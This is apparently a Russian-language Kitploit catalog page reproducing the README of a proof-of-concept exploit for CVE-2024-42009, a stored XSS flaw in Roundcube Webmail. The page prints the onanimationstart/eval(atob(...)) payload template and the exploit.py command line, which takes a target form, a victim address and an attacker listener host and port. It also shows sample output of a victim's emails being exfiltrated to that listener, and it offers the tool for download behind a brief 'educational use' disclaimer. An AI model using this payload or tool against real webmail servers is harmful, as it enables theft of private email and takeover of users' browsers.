Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-42009-PoC — CVE-2024-42009 Доказательство концепции | Kitploit
Инструменты/GitHubGitHub/danithehack3r/cve-2024-42009-poc
Инструменты фишингаЭксплуатацияЭксплуатация веб-приложенийЭксфильтрация данныхОбучение и ОбразованиеБезопасность Электронной Почты
GitHubdanithehack3r/cve-2024-42009-poc

CVE-2024-42009-PoC

CVE-2024-42009 Доказательство концепции

Репозиторий
711 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-42009 PoC: Перехватчик писем и XSS-эксплойт в Roundcube Webmail

Обзор

Этот репозиторий содержит proof-of-concept (PoC) эксплойт для CVE-2024-42009 — сохранённой уязвимости межсайтового скриптинга (XSS) в Roundcube Webmail версии 1.6.7 и ряде других версий. Эксплойт демонстрирует, как атакующий может внедрить вредоносный JavaScript в сообщение и воспользоваться проблемой десанитизации при разборе HTML внутри сообщения, что затем может быть использовано для кражи содержимого писем из почтового ящика жертвы в этом примере или даже для полного захвата браузера жертвы.

Детали уязвимости

Описание CVE

Уязвимость межсайтового скриптинга (XSS) в Roundcube до версии 1.5.7 и в версиях 1.6.x до 1.6.7 позволяет удалённому атакующему похищать и отправлять письма жертвы с помощью специально сформированного электронного сообщения, эксплуатирующего проблему десанитизации в функции message_body() в program/actions/mail/show.php.

Объяснение XSS-полезной нагрузки (для этого примера)

Эксплойт использует триггер CSS-анимации для выполнения XSS:

root@kitploit:~
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=eval(atob('BASE64_PAYLOAD')) foo=bar>

Тело разбирается как div, и нам нужно адаптироваться к этому, поэтому мы используем атрибут onanimationstart, чтобы вызвать функцию eval и выполнять из неё сложные JavaScript-вызовы. Чтобы узнать больше о том, как работает эксплойт и где находятся уязвимости в Roundcube, прочитайте эту статью.

Область применения

  • Данный эксплойт тестировался только на Roundcube Webmail версии 1.6.7
  • Жертва должна открыть сообщение, чтобы увидеть его содержимое
  • Может не сработать, если политика безопасности контента (CSP) настроена правильно

Использование

Зависимости

Установите необходимые Python-пакеты:

root@kitploit:~
python3 -m venv venv
python3 -m pip install -r requirements

Аргументы командной строки

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -r <RECIPIENT_EMAIL> -l <LISTENER_HOST> -p <LISTENER_PORT>
  • Целевой URL: В данном случае мы используем конечную точку контактной формы, которая обрабатывает сообщения и затем пересылает их (например, http://email.company.local/contact)
  • Электронная почта получателя: Действительный адрес электронной почты, который получит вредоносное сообщение
  • Хост прослушивания: IP-адрес вашей машины, доступный с целевого сервера
  • Порт прослушивания: Доступный порт для HTTP-сервера (например, 4444)

Пример использования

root@kitploit:~
python3 exploit.py -u http://webmail.target.com/contact -r [email protected] -l 192.168.1.100 -p 4444

Ожидаемый результат

root@kitploit:~
[*] Crafting payload for http://webmail.target.com/contact with recipient [email protected]
[*] Sending payload to http://webmail.target.com/contact with recipient [email protected]  
[*] Starting HTTP server on port 4444
[+] HTTP server listening on port 4444
[*] Waiting for emails... (Press Ctrl+C to stop manually)
[+] Received 3 emails!

------------------------------------------------------------
📧 EMAIL UID: 1  
------------------------------------------------------------
From: [email protected]
Subject: Quarterly Report
Message:
Please find attached the quarterly financial report...
------------------------------------------------------------

[+] Email exfiltration complete! Shutting down server...
[+] Server stopped successfully!

Ссылки

Исследование уязвимости

  • Блог SonarSource: Правительственные письма под угрозой — критическая уязвимость межсайтового скриптинга в Roundcube Webmail
  • Демонстрационное видео SonarSource

Правовой отказ от ответственности

⚠️ ВАЖНО: Этот proof-of-concept предоставлен только для образовательных и авторизованных целей тестирования. Используйте его ответственно, и эта учётная запись не несёт ответственности за любой ущерб, причинённый другими.

Скачать инструмент